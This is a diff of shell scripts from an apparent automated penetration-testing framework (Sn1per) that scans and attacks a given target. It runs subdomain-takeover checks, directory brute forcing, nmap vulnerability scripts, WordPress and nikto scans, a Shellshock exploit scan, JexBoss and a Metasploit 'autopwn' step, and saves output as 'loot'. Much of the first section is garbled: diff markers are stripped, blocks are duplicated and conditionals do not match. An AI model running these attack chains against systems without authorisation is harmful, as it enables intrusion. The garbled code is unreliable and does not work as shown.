echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}\"$RESET"
|
||||
fi
|
||||
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}"
|
||||
echo ""
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running web mode scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u https://$TARGET:443 -l 3 -s y -v n
|
||||
cat /usr/share/blackwidow/$TARGET*/$TARGET*.txt 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/weblinks-https-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-common.txt
|
||||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-full.txt
|
||||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u https://$TARGET:443 -l 3 -s y -v n
|
||||
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/weblinks-https-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
|
||||
fi
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
|
||||
if [ "$NMAP_SCRIPTS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port443.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null
|
||||
fi
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd --ssl -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-https.txt
|
||||
fi
|
||||
if [ "$CMSMAP" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cmsmap https://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
|
||||
echo ""
|
||||
cmsmap https://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WPSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url https://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
|
||||
echo ""
|
||||
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
|
||||
fi
|
||||
if [ "$NIKTO" = "1" ]; then
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-exploits.txt
|
||||
fi
|
||||
fi
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
|
||||
if [ "$NMAP_SCRIPTS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port443.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null
|
||||
fi
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
|
||||
fi
|
||||
if [ "$SHOCKER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --ssl --port 443 | tee $LOOT_DIR/web/shocker-$TARGET-port443.txt
|
||||
fi
|
||||
if [ "$JEXBOSS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port443.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port443.raw > $LOOT_DIR/web/jexboss-$TARGET-port443.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port443.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
|
||||
PORT="443"
|
||||
SSL="true"
|
||||
source modes/web_autopwn.sh
|
||||
fi
|
||||
clusterd --ssl -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-https.txt
|
||||
fi
|
||||
if [ "$CMSMAP" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cmsmap https://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
|
||||
echo ""
|
||||
cmsmap https://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WPSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url https://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
|
||||
echo ""
|
||||
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
|
||||
fi
|
||||
if [ "$NIKTO" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http-port443.txt
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port443.txt
|
||||
fi
|
||||
if [ "$SHOCKER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --ssl --port 443 | tee $LOOT_DIR/web/shocker-$TARGET-port443.txt
|
||||
fi
|
||||
if [ "$JEXBOSS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port443.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port443.raw > $LOOT_DIR/web/jexboss-$TARGET-port443.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port443.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished web mode scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
|
||||
PORT="443"
|
||||
SSL="true"
|
||||
source modes/web_autopwn.sh
|
||||
fi
|
||||
fi
|
||||
|
|
@ -9,7 +9,7 @@ if [ "$MODE" = "nuke" ]; then
|
|||
for a in `cat $FILE`;
|
||||
do
|
||||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -b -re -o -fp -w $WORKSPACE"
|
||||
args="$args -b -fp -w $WORKSPACE"
|
||||
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $WORKSPACE_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $WORKSPACE_DIR 2> /dev/null
|
||||
|
|
@ -40,11 +40,18 @@ if [ "$MODE" = "nuke" ]; then
|
|||
echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET"
|
||||
echo -e "$RESET"
|
||||
if [ ! -z "$WORKSPACE_DIR" ]; then
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
else
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
fi
|
||||
args=""
|
||||
done
|
||||
|
|
@ -52,5 +59,8 @@ if [ "$MODE" = "nuke" ]; then
|
|||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
fi
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
|
|
@ -1,4 +1,7 @@
|
|||
if [ "$OSINT" = "1" ]; then
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running OSINT: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -23,4 +26,7 @@ if [ "$OSINT" = "1" ]; then
|
|||
fi
|
||||
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished OSINT: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -4,6 +4,9 @@
|
|||
echo -e "$OKRED SKIPPING OSINT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
else
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running stage 2 OSINT check: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
if [ $GOOHAK = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
|
||||
|
|
@ -20,5 +23,8 @@
|
|||
rm -Rf output/ cookie.txt exploits.conf
|
||||
fi
|
||||
GHDB="1"
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished stage 2 OSINT check: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -1,4 +1,7 @@
|
|||
if [ "$RECON" = "1" ]; then
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running recon scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -40,27 +43,12 @@ if [ "$RECON" = "1" ]; then
|
|||
echo ""
|
||||
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
|
||||
fi
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
if [ "$CENSYS_SUBDOMAINS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING CENSYS SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/censys-subdomain-finder/censys_subdomain_finder.py --censys-api-id $CENSYS_APP_ID --censys-api-secret $CENSYS_API_SECRET $TARGET | egrep "\-" | awk '{print $2}' | tee $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
if [ "$PROJECT_SONAR" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING PROJECT SONAR SUBDOMAINS $RESET"
|
||||
|
|
@ -92,11 +80,15 @@ if [ "$RECON" = "1" ]; then
|
|||
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
|
||||
fi
|
||||
if [ "$SUBOVER" = "1" ]; then
|
||||
cd ~/go/src/github.com/Ice3man543/SubOver
|
||||
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/subover-$TARGET > $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/takeovers-$TARGET-subover 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
if [ "$SUBJACK" = "1" ]; then
|
||||
~/go/bin/subjack -w $LOOT_DIR/domains/domains-$TARGET-full.txt -t 10 -o $LOOT_DIR/nmap/subjack-$TARGET.txt -a -v
|
||||
fi
|
||||
if [ "$SLURP" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
|
||||
|
|
@ -104,4 +96,13 @@ if [ "$RECON" = "1" ]; then
|
|||
cd $PLUGINS_DIR/slurp/
|
||||
./slurp-linux-amd64 domain --domain $TARGET | tee $LOOT_DIR/nmap/takeovers-$TARGET-s3-buckets.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$SUBNET_RETRIEVAL" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED STARTING SUBNET RETRIEVAL $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -s -L --data "ip=$TARGET" https://2ip.me/en/services/information-service/provider-ip\?a\=act | grep -o -E '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/[0-9]{1,2}' | tee $LOOT_DIR/nmap/subnets-$TARGET.txt
|
||||
fi
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished recon scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
fi
|
||||
|
|
@ -28,8 +28,12 @@ if [ "$MODE" = "stealth" ]; then
|
|||
mkdir $LOOT_DIR/output 2> /dev/null
|
||||
fi
|
||||
args="$args --noreport -m stealth"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
echo -e "$OKRED ____ $RESET"
|
||||
|
|
@ -39,8 +43,8 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo -e "$RESET"
|
||||
echo -e "$OKORANGE + -- --=[http://xerosecurity.com"
|
||||
echo -e "$OKORANGE + -- --=[Sn1per v$VER by 1N3"
|
||||
echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
|
||||
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
|
||||
echo -e "$OKRED "
|
||||
echo -e "$OKRED ./\."
|
||||
echo -e "$OKRED ./ '\."
|
||||
|
|
@ -85,7 +89,7 @@ if [ "$MODE" = "stealth" ]; then
|
|||
fi
|
||||
dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
|
||||
dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
|
||||
dig A $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
|
||||
host $TARGET 2> /dev/null | grep address 2> /dev/null | awk '{print $4}' 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
|
||||
dnsenum $TARGET 2> /dev/null | tee $LOOT_DIR/output/dnsenum-$TARGET.txt 2> /dev/null
|
||||
